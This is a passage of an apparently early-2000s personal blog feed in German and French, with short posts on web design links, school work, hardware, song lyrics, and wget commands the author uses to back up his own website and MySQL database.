  14784.    <description><![CDATA[Verschiedene deutsche Tutorials zu <a href=""><b>GIMP</b></a>:<br>- <a href=""><b>Gimp verstehen</b></a><br>-  <a href=""><b>Nachbearbeitet </b></a><br>- <a href=""><b>Scheibchenweise</b></a><br>- <a href=""><b>Angestöpselt</b></a><br>- <a href=""><b>Gimpressionen</b></a><br>- <a href=""><b>Bilder fürs Web</b></a><br>- <a href=""><b>Farbverläufe und Pfade</b></a><br>- <a href=""><b>Bildbearbeitung mit Gimp 1.2</b></a><br>- <a href=""><b>Grokking the Gimp</b></a><br>- <a href=""><b>Gimp in 80 Minuten</b></a><br>- <a href=""><b>die Gimp-Seiten</b></a><br>- <a href="#" class="gone"><b>Fotoretusche mit Gimp</b></a><br>- <a href=""><b>GIMP for Windows</b></a><br>- <a href=""><b>Lehrfilme</b></a><br><br>abgestaubt bei <a href=""><b>rompe</b></a> und <a href=""><b>mk</b></a>
  14785. ]]></description>
  14786.    <content:encoded><![CDATA[Verschiedene deutsche Tutorials zu <a href=""><b>GIMP</b></a>:<br>- <a href=""><b>Gimp verstehen</b></a><br>-  <a href=""><b>Nachbearbeitet </b></a><br>- <a href=""><b>Scheibchenweise</b></a><br>- <a href=""><b>Angestöpselt</b></a><br>- <a href=""><b>Gimpressionen</b></a><br>- <a href=""><b>Bilder fürs Web</b></a><br>- <a href=""><b>Farbverläufe und Pfade</b></a><br>- <a href=""><b>Bildbearbeitung mit Gimp 1.2</b></a><br>- <a href=""><b>Grokking the Gimp</b></a><br>- <a href=""><b>Gimp in 80 Minuten</b></a><br>- <a href=""><b>die Gimp-Seiten</b></a><br>- <a href="#" class="gone"><b>Fotoretusche mit Gimp</b></a><br>- <a href=""><b>GIMP for Windows</b></a><br>- <a href=""><b>Lehrfilme</b></a><br><br>abgestaubt bei <a href=""><b>rompe</b></a> und <a href=""><b>mk</b></a>
  14787. ]]></content:encoded>
  14788.  </item>
  14790.  <item>
  14791.    <title>Forum du PHP 2002 - Paris</title>
  14792.    <link></link>
  14793.    <guid isPermaLink="true"></guid>
  14794.    <dc:creator>Andreas Jaggi</dc:creator>
  14795.    <creativeCommons:license></creativeCommons:license>
  14796.    <pubDate>Tue, 03 Dec 2002 01:28:00 +0100</pubDate>
  14797.    <category domain="">Coding</category>
  14798.    <description><![CDATA[<br><a href=""><img src="" alt="AFUP : Association Française des Utilisateurs de PHP"></a><br><br>L'AFUP propose de participier au <a href=""><b>Forum de PHP 2002</b></a> à Paris les 9 et 10 décembre 2002.
  14799. ]]></description>
  14800.    <content:encoded><![CDATA[<br><a href=""><img src="" alt="AFUP : Association Française des Utilisateurs de PHP"></a><br><br>L'AFUP propose de participier au <a href=""><b>Forum de PHP 2002</b></a> à Paris les 9 et 10 décembre 2002.
  14801. ]]></content:encoded>
  14802.  </item>
  14804.  <item>
  14805.    <title></title>
  14806.    <link></link>
  14807.    <guid isPermaLink="true"></guid>
  14808.    <dc:creator>Andreas Jaggi</dc:creator>
  14809.    <creativeCommons:license></creativeCommons:license>
  14810.    <pubDate>Tue, 03 Dec 2002 01:17:00 +0100</pubDate>
  14811.    <category domain="">Webdesign</category>
  14812.    <description><![CDATA[<i><a href=""><b>CSS-Technik</b></a> ist ein moderiertes Online-Projekt zur Sammlung von Ressourcen, Scripte und Tutorials zum Thema CSS und PHP für Webgestalter und Internetworker.</i><br>via <a href=""><b>[i-worker]</b></a>
  14813. ]]></description>
  14814.    <content:encoded><![CDATA[<i><a href=""><b>CSS-Technik</b></a> ist ein moderiertes Online-Projekt zur Sammlung von Ressourcen, Scripte und Tutorials zum Thema CSS und PHP für Webgestalter und Internetworker.</i><br>via <a href=""><b>[i-worker]</b></a>
  14815. ]]></content:encoded>
  14816.  </item>
  14818.  <item>
  14819.    <title>Es weihnachtet ...</title>
  14820.    <link></link>
  14821.    <guid isPermaLink="true"></guid>
  14822.    <dc:creator>Andreas Jaggi</dc:creator>
  14823.    <creativeCommons:license></creativeCommons:license>
  14824.    <pubDate>Mon, 02 Dec 2002 20:44:00 +0100</pubDate>
  14825.    <category domain="">Misc</category>
  14826.    <description><![CDATA[<a href=""><b>Sannie</b></a> hat einige amüsante <a href=""><b>Weihnachtsgeschichten</b></a> ;-)
  14827. ]]></description>
  14828.    <content:encoded><![CDATA[<a href=""><b>Sannie</b></a> hat einige amüsante <a href=""><b>Weihnachtsgeschichten</b></a> ;-)
  14829. ]]></content:encoded>
  14830.  </item>
  14832.  <item>
  14833.    <title>100 % francophone</title>
  14834.    <link></link>
  14835.    <guid isPermaLink="true"></guid>
  14836.    <dc:creator>Andreas Jaggi</dc:creator>
  14837.    <creativeCommons:license></creativeCommons:license>
  14838.    <pubDate>Mon, 02 Dec 2002 01:10:00 +0100</pubDate>
  14839.    <category domain="">Linux</category>
  14840.    <description><![CDATA[On trouve sur <a href=""><b></b></a> des logiciels libres et 100% francophones ;-)
  14841. ]]></description>
  14842.    <content:encoded><![CDATA[On trouve sur <a href=""><b></b></a> des logiciels libres et 100% francophones ;-)
  14843. ]]></content:encoded>
  14844.  </item>
  14846.  <item>
  14847.    <title>Winterswap</title>
  14848.    <link></link>
  14849.    <guid isPermaLink="true"></guid>
  14850.    <dc:creator>Andreas Jaggi</dc:creator>
  14851.    <creativeCommons:license></creativeCommons:license>
  14852.    <pubDate>Mon, 02 Dec 2002 00:12:00 +0100</pubDate>
  14853.    <category domain="">Misc</category>
  14854.    <description><![CDATA[So, die Tracklist für den <a href=""><b>Winterswap</b></a> steht und die Discs sind gebraten ;-)
  14855. ]]></description>
  14856.    <content:encoded><![CDATA[So, die Tracklist für den <a href=""><b>Winterswap</b></a> steht und die Discs sind gebraten ;-)
  14857. ]]></content:encoded>
  14858.  </item>
  14860.  <item>
  14861.    <title>World AIDS Day</title>
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  14869. ]]></description>
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  14875.    <title>Maturaarbeitpräsentation</title>
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  14878.    <dc:creator>Andreas Jaggi</dc:creator>
  14879.    <creativeCommons:license></creativeCommons:license>
  14880.    <pubDate>Fri, 29 Nov 2002 17:45:00 +0100</pubDate>
  14881.    <category domain="">School</category>
  14882.    <description><![CDATA[So, Präsentation ist fertig vorbereitet. Nun geht's ab ins <a href=""><b>Gymnasium</b></a>, auf dass um 20 Uhr alles klappt :-)
  14883. ]]></description>
  14884.    <content:encoded><![CDATA[So, Präsentation ist fertig vorbereitet. Nun geht's ab ins <a href=""><b>Gymnasium</b></a>, auf dass um 20 Uhr alles klappt :-)
  14885. ]]></content:encoded>
  14886.  </item>
  14888.  <item>
  14889.    <title>Mozilla 1.2 Released</title>
  14890.    <link></link>
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  14892.    <dc:creator>Andreas Jaggi</dc:creator>
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  14894.    <pubDate>Wed, 27 Nov 2002 17:24:00 +0100</pubDate>
  14895.    <category domain="">Misc</category>
  14896.    <description><![CDATA[<a href=""><b>Mozilla</b></a> 1.2 stable est là! <a href=""><b>Ici</b></a> télécharger!
  14897. ]]></description>
  14898.    <content:encoded><![CDATA[<a href=""><b>Mozilla</b></a> 1.2 stable est là! <a href=""><b>Ici</b></a> télécharger!
  14899. ]]></content:encoded>
  14900.  </item>
  14902.  <item>
  14903.    <title>Maturaarbeit</title>
  14904.    <link></link>
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  14906.    <dc:creator>Andreas Jaggi</dc:creator>
  14907.    <creativeCommons:license></creativeCommons:license>
  14908.    <pubDate>Wed, 27 Nov 2002 01:46:00 +0100</pubDate>
  14909.    <category domain="">School</category>
  14910.    <description><![CDATA[<a href=""><b>Hier</b></a> gibt's meine Maturaarbeit (Usability - Benutzerfreundlichkeit von Websites) als PDF zum Download.<br>Es ist nur eine Light-Version fürs Web. Wer die 500 MB Print-Version will, bitte melden ;-)<br><br>Logischerweise bin ich mit dem Vorbereiten der Präsentation noch nirgends ;-)
  14911. ]]></description>
  14912.    <content:encoded><![CDATA[<a href=""><b>Hier</b></a> gibt's meine Maturaarbeit (Usability - Benutzerfreundlichkeit von Websites) als PDF zum Download.<br>Es ist nur eine Light-Version fürs Web. Wer die 500 MB Print-Version will, bitte melden ;-)<br><br>Logischerweise bin ich mit dem Vorbereiten der Präsentation noch nirgends ;-)
  14913. ]]></content:encoded>
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  14917.    <title>Unterhaltung</title>
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  14920.    <dc:creator>Andreas Jaggi</dc:creator>
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  14922.    <pubDate>Tue, 26 Nov 2002 13:59:00 +0100</pubDate>
  14923.    <category domain="">Misc</category>
  14924.    <description><![CDATA[<a href=""><b>Voll Krass bei die Ring</b></a> - Der Herr der Ringe, kommentiert ;-)<br>abgestaubt bei <a href=""><b>mk</b></a>
  14925. ]]></description>
  14926.    <content:encoded><![CDATA[<a href=""><b>Voll Krass bei die Ring</b></a> - Der Herr der Ringe, kommentiert ;-)<br>abgestaubt bei <a href=""><b>mk</b></a>
  14927. ]]></content:encoded>
  14928.  </item>
  14930.  <item>
  14931.    <title>:.</title>
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  14934.    <dc:creator>Andreas Jaggi</dc:creator>
  14935.    <creativeCommons:license></creativeCommons:license>
  14936.    <pubDate>Mon, 25 Nov 2002 23:33:00 +0100</pubDate>
  14937.    <category domain="">Tech</category>
  14938.    <description><![CDATA[Meine <a href=""><b>Maus</b></a>, meine <a href=""><b>Tastatur</b></a> und mein <a href=""><b>Gehäuse</b></a>. Schön bunt, nicht? ;-)
  14939. ]]></description>
  14940.    <content:encoded><![CDATA[Meine <a href=""><b>Maus</b></a>, meine <a href=""><b>Tastatur</b></a> und mein <a href=""><b>Gehäuse</b></a>. Schön bunt, nicht? ;-)
  14941. ]]></content:encoded>
  14942.  </item>
  14944.  <item>
  14945.    <title>200. Eintrag!</title>
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  14948.    <dc:creator>Andreas Jaggi</dc:creator>
  14949.    <creativeCommons:license></creativeCommons:license>
  14950.    <pubDate>Mon, 25 Nov 2002 21:18:00 +0100</pubDate>
  14951.    <category domain="">Misc</category>
  14952.    <description><![CDATA[Es lässt sich also doch so einiges an Schwachsinn zusammentragen ;-)
  14953. ]]></description>
  14954.    <content:encoded><![CDATA[Es lässt sich also doch so einiges an Schwachsinn zusammentragen ;-)
  14955. ]]></content:encoded>
  14956.  </item>
  14958.  <item>
  14959.    <title>TCP/IP - Lehrgang</title>
  14960.    <link></link>
  14961.    <guid isPermaLink="true"></guid>
  14962.    <dc:creator>Andreas Jaggi</dc:creator>
  14963.    <creativeCommons:license></creativeCommons:license>
  14964.    <pubDate>Mon, 25 Nov 2002 21:13:00 +0100</pubDate>
  14965.    <category domain="">Networking</category>
  14966.    <description><![CDATA[Noch eine Gedächtnisstütze: <a href=""><b>TCP/IP - Lehrgang</b></a> von <a href=""><b>Dr. Rudolf Strub</b></a>
  14967. ]]></description>
  14968.    <content:encoded><![CDATA[Noch eine Gedächtnisstütze: <a href=""><b>TCP/IP - Lehrgang</b></a> von <a href=""><b>Dr. Rudolf Strub</b></a>
  14969. ]]></content:encoded>
  14970.  </item>
  14972.  <item>
  14973.    <title>Einführung in Unix und die csh</title>
  14974.    <link></link>
  14975.    <guid isPermaLink="true"></guid>
  14976.    <dc:creator>Andreas Jaggi</dc:creator>
  14977.    <creativeCommons:license></creativeCommons:license>
  14978.    <pubDate>Mon, 25 Nov 2002 21:12:00 +0100</pubDate>
  14979.    <category domain="">Linux</category>
  14980.    <description><![CDATA[Nur damit ich den Link nicht verliere: <a href=""><b>Einführung in Unix und die csh</b></a> von <a href=""><b>Dr. Rudolf Strub</b></a><br>Dort hat's übrigens noch mehr Anleitungen: <a href=""><b>perl/Tk</b></a> und <a href=""><b>VNC</b></a>.
  14981. ]]></description>
  14982.    <content:encoded><![CDATA[Nur damit ich den Link nicht verliere: <a href=""><b>Einführung in Unix und die csh</b></a> von <a href=""><b>Dr. Rudolf Strub</b></a><br>Dort hat's übrigens noch mehr Anleitungen: <a href=""><b>perl/Tk</b></a> und <a href=""><b>VNC</b></a>.
  14983. ]]></content:encoded>
  14984.  </item>
  14986.  <item>
  14987.    <title>centricle</title>
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  14990.    <dc:creator>Andreas Jaggi</dc:creator>
  14991.    <creativeCommons:license></creativeCommons:license>
  14992.    <pubDate>Mon, 25 Nov 2002 21:07:00 +0100</pubDate>
  14993.    <category domain="">Webdesign</category>
  14994.    <description><![CDATA[Auf <a href=""><b></b></a> findet man viele Informationen über CSS. Look at it!
  14995. ]]></description>
  14996.    <content:encoded><![CDATA[Auf <a href=""><b></b></a> findet man viele Informationen über CSS. Look at it!
  14997. ]]></content:encoded>
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  15000.  <item>
  15001.    <title>Valid RSS</title>
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  15004.    <dc:creator>Andreas Jaggi</dc:creator>
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  15006.    <pubDate>Mon, 25 Nov 2002 21:02:00 +0100</pubDate>
  15007.    <category domain="">Coding</category>
  15008.    <description><![CDATA[<a href=""><img alt="Valid RSS" src=""></a><br><br>Mon RSS-Feed est <a href=""><b>valid</b></a>!
  15009. ]]></description>
  15010.    <content:encoded><![CDATA[<a href=""><img alt="Valid RSS" src=""></a><br><br>Mon RSS-Feed est <a href=""><b>valid</b></a>!
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  15014.  <item>
  15015.    <title>Evil phpMyAdmin Hack</title>
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  15018.    <dc:creator>Andreas Jaggi</dc:creator>
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  15020.    <pubDate>Mon, 25 Nov 2002 19:38:00 +0100</pubDate>
  15021.    <category domain="">Coding</category>
  15022.    <description><![CDATA[Mit <a href=""><b>wget</b></a> kann man natürlich auch <a href=""><b>MySQL</b></a>-DBs sichern. Wenn man nur eingeschränkten Zugriff zum Server hat, muss man die mysqldump-Funktion von <a href=""><b>phpMyAdmin</b></a> etwas missbrauchen ;-)<br><br>wget.exe -O F:Backup/mysqldump.sql --http-user=mysqluser --http-passwd=mysqlpassword ";what=data&amp;showcolumns=yes&amp;asfile=sendit"
  15023. ]]></description>
  15024.    <content:encoded><![CDATA[Mit <a href=""><b>wget</b></a> kann man natürlich auch <a href=""><b>MySQL</b></a>-DBs sichern. Wenn man nur eingeschränkten Zugriff zum Server hat, muss man die mysqldump-Funktion von <a href=""><b>phpMyAdmin</b></a> etwas missbrauchen ;-)<br><br>wget.exe -O F:Backup/mysqldump.sql --http-user=mysqluser --http-passwd=mysqlpassword ";what=data&amp;showcolumns=yes&amp;asfile=sendit"
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  15033.    <creativeCommons:license></creativeCommons:license>
  15034.    <pubDate>Mon, 25 Nov 2002 19:28:00 +0100</pubDate>
  15035.    <category domain="">Coding</category>
  15036.    <description><![CDATA[Schön, dass es <a href=""><b>wget</b></a> auch für Windows gibt. Damit kann man dann so schöne Sachen machen, wie zum Beispiel das automatisierte Backup einer ganzen Website:<br><br>wget.exe -m -P F:Backup
  15037. ]]></description>
  15038.    <content:encoded><![CDATA[Schön, dass es <a href=""><b>wget</b></a> auch für Windows gibt. Damit kann man dann so schöne Sachen machen, wie zum Beispiel das automatisierte Backup einer ganzen Website:<br><br>wget.exe -m -P F:Backup
  15039. ]]></content:encoded>
  15040.  </item>
  15042.  <item>
  15043.    <title> Logitech® MX™500 Optical Mouse</title>
  15044.    <link></link>
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  15046.    <dc:creator>Andreas Jaggi</dc:creator>
  15047.    <creativeCommons:license></creativeCommons:license>
  15048.    <pubDate>Mon, 25 Nov 2002 19:19:00 +0100</pubDate>
  15049.    <category domain="">Tech</category>
  15050.    <description><![CDATA[<a href=""><img src="" alt="Logitech® MX™500 Optical Mouse"></a><br><br>Jetzt meins ;-)<br><br>Ein Lob auf <a href=""><b></b></a>!
  15051. ]]></description>
  15052.    <content:encoded><![CDATA[<a href=""><img src="" alt="Logitech® MX™500 Optical Mouse"></a><br><br>Jetzt meins ;-)<br><br>Ein Lob auf <a href=""><b></b></a>!
  15053. ]]></content:encoded>
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  15057.    <title>em</title>
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  15060.    <dc:creator>Andreas Jaggi</dc:creator>
  15061.    <creativeCommons:license></creativeCommons:license>
  15062.    <pubDate>Sun, 24 Nov 2002 23:36:00 +0100</pubDate>
  15063.    <category domain="">Webdesign</category>
  15064.    <description><![CDATA[So, Schriftgrössenangaben sind nicht mehr in pt sondern in em.<br>Mozilla, IE und Opera interpretieren's in etwa gleich. Leider ist's nun im Netscape 4.x wirklich nicht mehr ansehbar.<br>Aber keine Sorge, dass nächste Layout ist schon in Planung ;-)
  15065. ]]></description>
  15066.    <content:encoded><![CDATA[So, Schriftgrössenangaben sind nicht mehr in pt sondern in em.<br>Mozilla, IE und Opera interpretieren's in etwa gleich. Leider ist's nun im Netscape 4.x wirklich nicht mehr ansehbar.<br>Aber keine Sorge, dass nächste Layout ist schon in Planung ;-)
  15067. ]]></content:encoded>
  15068.  </item>
  15070.  <item>
  15071.    <title>11h11</title>
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  15074.    <dc:creator>Andreas Jaggi</dc:creator>
  15075.    <creativeCommons:license></creativeCommons:license>
  15076.    <pubDate>Sun, 24 Nov 2002 00:48:00 +0100</pubDate>
  15077.    <category domain="">Webdesign</category>
  15078.    <description><![CDATA[Sur <a href=""><b></b></a> il y a plus de 400 oeuvres, crées en 40 projets. Et cela ne sont pas seulement des images crées avec photoshop. Il y a des peintures, des images digitales, des photographies, des illustrations, des sons et même des vidéos! C'est vraiment une source d'art multimédial :-)
  15079. ]]></description>
  15080.    <content:encoded><![CDATA[Sur <a href=""><b></b></a> il y a plus de 400 oeuvres, crées en 40 projets. Et cela ne sont pas seulement des images crées avec photoshop. Il y a des peintures, des images digitales, des photographies, des illustrations, des sons et même des vidéos! C'est vraiment une source d'art multimédial :-)
  15081. ]]></content:encoded>
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  15084.  <item>
  15085.    <title>12 inches couch</title>
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  15088.    <dc:creator>Andreas Jaggi</dc:creator>
  15089.    <creativeCommons:license></creativeCommons:license>
  15090.    <pubDate>Sun, 24 Nov 2002 00:30:00 +0100</pubDate>
  15091.    <category domain="">Webdesign</category>
  15092.    <description><![CDATA[<a href="">t w e l v e <b>i n c h e s</b> c o u c h</a> est le site d'une étudiante en graphisme.<br>Le site a un design très spécial, à voir absolument!
  15093. ]]></description>
  15094.    <content:encoded><![CDATA[<a href="">t w e l v e <b>i n c h e s</b> c o u c h</a> est le site d'une étudiante en graphisme.<br>Le site a un design très spécial, à voir absolument!
  15095. ]]></content:encoded>
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  15098.  <item>
  15099.    <title>Star Wars Episode IV</title>
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  15102.    <dc:creator>Andreas Jaggi</dc:creator>
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  15104.    <pubDate>Sat, 23 Nov 2002 20:24:00 +0100</pubDate>
  15105.    <category domain="">Misc</category>
  15106.    <description><![CDATA[Einfach mal das in die Kommandozeile eingeben: <pre>telnet</pre><br>Gefunden bei <a href=""><b>Abort, Retry, Fail?</b></a>
  15107. ]]></description>
  15108.    <content:encoded><![CDATA[Einfach mal das in die Kommandozeile eingeben: <pre>telnet</pre><br>Gefunden bei <a href=""><b>Abort, Retry, Fail?</b></a>
  15109. ]]></content:encoded>
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  15112.  <item>
  15113.    <title>Zeitraub</title>
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  15116.    <dc:creator>Andreas Jaggi</dc:creator>
  15117.    <creativeCommons:license></creativeCommons:license>
  15118.    <pubDate>Sat, 23 Nov 2002 19:43:00 +0100</pubDate>
  15119.    <category domain="">Misc</category>
  15120.    <description><![CDATA[Eigentlich wollte ich ja heute die Präsentation meiner Maturaarbeit vorbereiten, aber dann ist es doch anders gekommen. Hab noch ein wenig an meinem Weblog gebastelt.<br>Sichtbare Änderungen gibt's eigentlich keine, ausser dass jetzt die Schriftgrössen in pt und nicht mehr in px angegeben werden.
  15121. ]]></description>
  15122.    <content:encoded><![CDATA[Eigentlich wollte ich ja heute die Präsentation meiner Maturaarbeit vorbereiten, aber dann ist es doch anders gekommen. Hab noch ein wenig an meinem Weblog gebastelt.<br>Sichtbare Änderungen gibt's eigentlich keine, ausser dass jetzt die Schriftgrössen in pt und nicht mehr in px angegeben werden.
  15123. ]]></content:encoded>
  15124.  </item>
  15126.  <item>
  15127.    <title>Richtig defragmentieren</title>
  15128.    <link></link>
  15129.    <guid isPermaLink="true"></guid>
  15130.    <dc:creator>Andreas Jaggi</dc:creator>
  15131.    <creativeCommons:license></creativeCommons:license>
  15132.    <pubDate>Sat, 23 Nov 2002 12:14:00 +0100</pubDate>
  15133.    <category domain="">Tech</category>
  15134.    <description><![CDATA[Falls die Festplatte wieder so defragmentiert ist, wie <a href=""><b>damals bei mir</b></a>, hilft <a href=""><b>dieses Defragmentier-Tutorial</b></a> weiter ;-)<br><br>Von Ramon via ICQ
  15135. ]]></description>
  15136.    <content:encoded><![CDATA[Falls die Festplatte wieder so defragmentiert ist, wie <a href=""><b>damals bei mir</b></a>, hilft <a href=""><b>dieses Defragmentier-Tutorial</b></a> weiter ;-)<br><br>Von Ramon via ICQ
  15137. ]]></content:encoded>
  15138.  </item>
  15140.  <item>
  15141.    <title>Dös</title>
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  15144.    <dc:creator>Andreas Jaggi</dc:creator>
  15145.    <creativeCommons:license></creativeCommons:license>
  15146.    <pubDate>Fri, 22 Nov 2002 20:39:00 +0100</pubDate>
  15147.    <category domain="">Misc</category>
  15148.    <description><![CDATA[Ich weiss ehrlich nicht mehr, was mit mir los ist. Heute bin ich um 13 Uhr nach Hause gekommen und habe gleich bis 18 Uhr gepennt, einfach so. Und nachher hätte ich immernoch auf der Stelle einschlafen können. Hmm<br>Und das obwohl ich auf meinem 'Schulweg' schon 2 Stunden geschlafen habe und in der letzten Nacht wirklich nicht zuwenig Schlaf gekriegt habe. Komisch.
  15149. ]]></description>
  15150.    <content:encoded><![CDATA[Ich weiss ehrlich nicht mehr, was mit mir los ist. Heute bin ich um 13 Uhr nach Hause gekommen und habe gleich bis 18 Uhr gepennt, einfach so. Und nachher hätte ich immernoch auf der Stelle einschlafen können. Hmm<br>Und das obwohl ich auf meinem 'Schulweg' schon 2 Stunden geschlafen habe und in der letzten Nacht wirklich nicht zuwenig Schlaf gekriegt habe. Komisch.
  15151. ]]></content:encoded>
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  15158.    <dc:creator>Andreas Jaggi</dc:creator>
  15159.    <creativeCommons:license></creativeCommons:license>
  15160.    <pubDate>Thu, 21 Nov 2002 21:29:00 +0100</pubDate>
  15161.    <category domain="">Networking</category>
  15162.    <description><![CDATA[Sur <a href=""><b></b></a> il y a des traductions françaises des RFC. Les RFC sont des documents qui font référence auprès de la Communauté Internet et qui décrivent, spécifient, aident à l'implémentation, standardisent et débattent de la majorité des normes, standards, technologies et protocoles liés à Internet et aux réseaux en général.
  15163. ]]></description>
  15164.    <content:encoded><![CDATA[Sur <a href=""><b></b></a> il y a des traductions françaises des RFC. Les RFC sont des documents qui font référence auprès de la Communauté Internet et qui décrivent, spécifient, aident à l'implémentation, standardisent et débattent de la majorité des normes, standards, technologies et protocoles liés à Internet et aux réseaux en général.
  15165. ]]></content:encoded>
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  15168.  <item>
  15169.    <title>Realien</title>
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  15171.    <guid isPermaLink="true"></guid>
  15172.    <dc:creator>Andreas Jaggi</dc:creator>
  15173.    <creativeCommons:license></creativeCommons:license>
  15174.    <pubDate>Thu, 21 Nov 2002 21:18:00 +0100</pubDate>
  15175.    <category domain="">School</category>
  15176.    <description><![CDATA[Wer wie ich die Lateinnote mit dem Schreiben von Realien rettet, findet <a href=""><b>hier</b></a> einige Texte und Links zu verschiedenen anderen Texten.
  15177. ]]></description>
  15178.    <content:encoded><![CDATA[Wer wie ich die Lateinnote mit dem Schreiben von Realien rettet, findet <a href=""><b>hier</b></a> einige Texte und Links zu verschiedenen anderen Texten.
  15179. ]]></content:encoded>
  15180.  </item>
  15182.  <item>
  15183.    <title>Johnny Colère</title>
  15184.    <link></link>
  15185.    <guid isPermaLink="true"></guid>
  15186.    <dc:creator>Andreas Jaggi</dc:creator>
  15187.    <creativeCommons:license></creativeCommons:license>
  15188.    <pubDate>Wed, 20 Nov 2002 15:18:00 +0100</pubDate>
  15189.    <category domain="">Music</category>
  15190.    <description><![CDATA[Johnny m'a dit, Johnny m'a dit<br>Oublie ton père, oublie ta mère<br>Oublie ton coeur, oublie tes moeurs<br><br>Johnny m'a dit, Johnny m'a dit<br>Tupamaramos, Cangaceiros<br>C'est le camp qu'il faut choisir<br><br>Johnny m'a dit, Johnny m'a dit<br>Tout ça un soir ou le ciel zèbre d'éclairs<br>Nous déclarait "Nous allons fonder le parti unique"<br><br>Johnny m'a dit, Johnny m'a dit<br>Rejoins tes frères, rejoins tes soeurs<br>Bois le sang de ton ennemi<br><br>Johnny m'a dit, Johnny m'a dit<br>Ecarte le rouge, écarte le blanc<br>La seule couleur, c'est noir brillant<br>Johnny m'a dit, Johnny m'a dit<br>Tout ça un soir ou le ciel zèbre d'éclairs<br>Nous déclarait "Nous allons fonder le parti unique"<br><br>Et la victoire caresse l'espoir de nous appartenir<br>Et la victoire caresse l'espoir de nous appartenir<br>Car il faut tenir<br>Johnny m'a dit<br>Johnny m'a dit<br>Johnny m'a dit<br>Johnny m'a dit<br><br><a href=""><b>Noir Désir</b></a> - Tostaky
  15191. ]]></description>
  15192.    <content:encoded><![CDATA[Johnny m'a dit, Johnny m'a dit<br>Oublie ton père, oublie ta mère<br>Oublie ton coeur, oublie tes moeurs<br><br>Johnny m'a dit, Johnny m'a dit<br>Tupamaramos, Cangaceiros<br>C'est le camp qu'il faut choisir<br><br>Johnny m'a dit, Johnny m'a dit<br>Tout ça un soir ou le ciel zèbre d'éclairs<br>Nous déclarait "Nous allons fonder le parti unique"<br><br>Johnny m'a dit, Johnny m'a dit<br>Rejoins tes frères, rejoins tes soeurs<br>Bois le sang de ton ennemi<br><br>Johnny m'a dit, Johnny m'a dit<br>Ecarte le rouge, écarte le blanc<br>La seule couleur, c'est noir brillant<br>Johnny m'a dit, Johnny m'a dit<br>Tout ça un soir ou le ciel zèbre d'éclairs<br>Nous déclarait "Nous allons fonder le parti unique"<br><br>Et la victoire caresse l'espoir de nous appartenir<br>Et la victoire caresse l'espoir de nous appartenir<br>Car il faut tenir<br>Johnny m'a dit<br>Johnny m'a dit<br>Johnny m'a dit<br>Johnny m'a dit<br><br><a href=""><b>Noir Désir</b></a> - Tostaky
  15193. ]]></content:encoded>
  15194.  </item>
  15196.  <item>
  15197.    <title>Schnarch</title>
  15198.    <link></link>
  15199.    <guid isPermaLink="true"></guid>
  15200.    <dc:creator>Andreas Jaggi</dc:creator>
  15201.    <creativeCommons:license></creativeCommons:license>
  15202.    <pubDate>Wed, 20 Nov 2002 15:08:00 +0100</pubDate>
  15203.    <category domain="">Misc</category>
  15204.    <description><![CDATA[Gestern um 19 Uhr nach Hause gekommen, vor den Fernseher gesetzt, etwa 15 min. später eingeschlafen, ca. um Mitternacht im Halbschlaf in mein Bett gewankt, weitergeschlafen bis 5 Uhr. Macht 10 Stunden Schlaf!<br>Und damit noch lange nicht genug ;-)<br>Um 6 Uhr in den Zug gesetzt und schon wieder einfach eingepennt. +1 Stunde Schlaf.<br>Und nocheinmal +1 Stunde Schlaf auf der Heimfahrt.<br><br>Bin ich schlafsüchtig?
  15205. ]]></description>
  15206.    <content:encoded><![CDATA[Gestern um 19 Uhr nach Hause gekommen, vor den Fernseher gesetzt, etwa 15 min. später eingeschlafen, ca. um Mitternacht im Halbschlaf in mein Bett gewankt, weitergeschlafen bis 5 Uhr. Macht 10 Stunden Schlaf!<br>Und damit noch lange nicht genug ;-)<br>Um 6 Uhr in den Zug gesetzt und schon wieder einfach eingepennt. +1 Stunde Schlaf.<br>Und nocheinmal +1 Stunde Schlaf auf der Heimfahrt.<br><br>Bin ich schlafsüchtig?
  15207. ]]></content:encoded>
  15208.  </item>
  15210.  <item>
  15211.    <title>GeForce FX</title>
  15212.    <link></link>
  15213.    <guid isPermaLink="true"></guid>
  15214.    <dc:creator>Andreas Jaggi</dc:creator>
  15215.    <creativeCommons:license></creativeCommons:license>
  15216.    <pubDate>Mon, 18 Nov 2002 22:43:00 +0100</pubDate>
  15217.    <category domain="">Tech</category>
  15218.    <description><![CDATA[<a href=""><b>NVIDIA</b></a> <a href=""><b>präsentiert</b></a> ihren neuen Graphikchip. Haben will!
  15219. ]]></description>
  15220.    <content:encoded><![CDATA[<a href=""><b>NVIDIA</b></a> <a href=""><b>präsentiert</b></a> ihren neuen Graphikchip. Haben will!
  15221. ]]></content:encoded>
  15222.  </item>
  15224.  <item>
  15225.    <title>Redesign</title>
  15226.    <link></link>
  15227.    <guid isPermaLink="true"></guid>
  15228.    <dc:creator>Andreas Jaggi</dc:creator>
  15229.    <creativeCommons:license></creativeCommons:license>
  15230.    <pubDate>Mon, 18 Nov 2002 21:55:00 +0100</pubDate>
  15231.    <category domain="">Misc</category>
  15232.    <description><![CDATA[<a href=""><b>s h a d o w</b></a> a un nouveau design.<br>Un peu de style 'dirty' et un peu de style 'retro'. Le résultat est un design actuel et attractif.<br><br>Je pense aussi à changer mon design. Est-ce que vous avez des désirs spéciaux?
  15233. ]]></description>
  15234.    <content:encoded><![CDATA[<a href=""><b>s h a d o w</b></a> a un nouveau design.<br>Un peu de style 'dirty' et un peu de style 'retro'. Le résultat est un design actuel et attractif.<br><br>Je pense aussi à changer mon design. Est-ce que vous avez des désirs spéciaux?
  15235. ]]></content:encoded>
  15236.  </item>
  15238.  <item>
  15239.    <title>Welcome Back</title>
  15240.    <link></link>
  15241.    <guid isPermaLink="true"></guid>
  15242.    <dc:creator>Andreas Jaggi</dc:creator>
  15243.    <creativeCommons:license></creativeCommons:license>
  15244.    <pubDate>Mon, 18 Nov 2002 16:36:00 +0100</pubDate>
  15245.    <category domain="">Misc</category>
  15246.    <description><![CDATA[Das <a href=""><b>flashback</b></a> wird wieder gefüllt. Scheint, als klappt das mit dem Internetzugang nun doch. Gratulation! ;-)
  15247. ]]></description>
  15248.    <content:encoded><![CDATA[Das <a href=""><b>flashback</b></a> wird wieder gefüllt. Scheint, als klappt das mit dem Internetzugang nun doch. Gratulation! ;-)
  15249. ]]></content:encoded>
  15250.  </item>
  15252.  <item>
  15253.    <title>Einsteinrätsel</title>
  15254.    <link></link>
  15255.    <guid isPermaLink="true"></guid>
  15256.    <dc:creator>Andreas Jaggi</dc:creator>
  15257.    <creativeCommons:license></creativeCommons:license>
  15258.    <pubDate>Mon, 18 Nov 2002 00:44:00 +0100</pubDate>
  15259.    <category domain="">Misc</category>
